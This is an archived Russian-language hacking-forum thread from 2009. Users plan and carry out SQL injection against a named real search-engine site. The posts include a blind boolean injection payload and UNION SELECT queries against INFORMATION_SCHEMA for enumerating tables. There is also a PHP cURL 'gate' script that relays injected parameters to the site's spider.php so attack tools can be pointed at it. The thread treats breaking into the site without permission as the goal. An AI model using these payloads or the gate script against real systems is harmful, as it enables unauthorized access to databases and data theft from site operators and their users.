ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.11.2009, 15:25
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
В опере просит сатй добавить =\
|
|
|
16.11.2009, 16:32
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
Провел на форуме:
3426765
Репутация:
257
|
|
Сообщение от Ponchik
В опере просит сатй добавить =\
угу  +2 ошибки в словах на http://search.sakh-sun.ru/add_site.php
|
|
|
|
16.11.2009, 15:37
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 365
Провел на форуме:
1289173
Репутация:
39
|
|
чё то встал он у меня при индексации на 14
|
|
|
|
16.11.2009, 15:46
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Пойду хекоть раз sql inj есть
5.1.38-log
|
|
|
|
16.11.2009, 15:54
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Сообщение от Ponchik
Пойду хекоть раз sql inj есть
5.1.38-log
брутом?
|
|
|
|
16.11.2009, 15:55
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Сообщение от L I G A
брутом?
СИ
|
|
|
|
16.11.2009, 15:50
|
|
Постоянный
Регистрация: 08.06.2009
Сообщений: 509
Провел на форуме:
3133559
Репутация:
766
|
|
Magic Searh атаковал!111
Работничег =\
|
|
|
|
16.11.2009, 16:05
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
Код:
-' and IF(substring((version()),1,1)=5,1,(select 1 union select 2)) and ''='
|
|
|
|
16.11.2009, 16:58
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Сообщение от l1ght
вот для кого люди стараются ?  https://forum.antichat.ru/showpost.php?p=1630322&postcount=13 Там описан метод как найти таблы если пага не меняется, но есть вывод ошибок, и то там брутом 
А тут пага меняется, при TRUE говорит "присутствует в базе данных" если FALSE - не говорит
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=1#
http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2#
Если запрос вернёт "1" скрипт говорит "присутствует в базе данных", просто Union select 1,2 не вернёт, поэтому надо из таблы, и добовляем условие
Хакеры... 
Нате вам гейт для GET Запроса
PHP код:
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://search.sakh-sun.ru/spider.php");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, 'url=http%3A%2F%2F2q%27+UNION+SELECT+1%2C2+FROM+information_schema.tables+WHERE+1%3D1'.$_GET['c'].'&soption=level&maxlevel=2&in=&out=');
curl_exec($ch);
curl_close($ch);
?>
Можно будет юзать script.php?c=%20AND 1=1%23
Ну я для себя делал потомучо мне быстрее гейт написать, чем настроить тузлу на POST
Последний раз редактировалось Ponchik; 16.11.2009 в 17:10..
|
|
|
|
16.11.2009, 16:06
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
там больше 15 таблиц >_<
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид